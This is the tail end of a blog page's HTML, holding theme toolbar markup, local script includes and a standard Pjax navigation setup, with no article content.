    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-expand-width flex-center">
            <i class="fa-regular fa-expand"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    


</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/layouts/navbarShrink.js"></script>

<script src="/js/tools/scrollTopBottom.js"></script>

<script src="/js/tools/lightDarkSwitch.js"></script>





    
<script src="/js/tools/codeBlock.js"></script>




    
<script src="/js/layouts/lazyload.js"></script>




    
<script src="/js/tools/runtime.js"></script>

    
<script src="/js/layouts/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js"></script>







<div class="post-scripts pjax">
    
        
<script src="/js/tools/tocToggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/layouts/toc.js"></script>

<script src="/js/plugins/tabs.js"></script>

    
</div>


    
<script src="/js/libs/pjax.min.js"></script>

<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            Global.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            Global.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            Global.refresh();
        });
    });
</script>




</body>
</html>
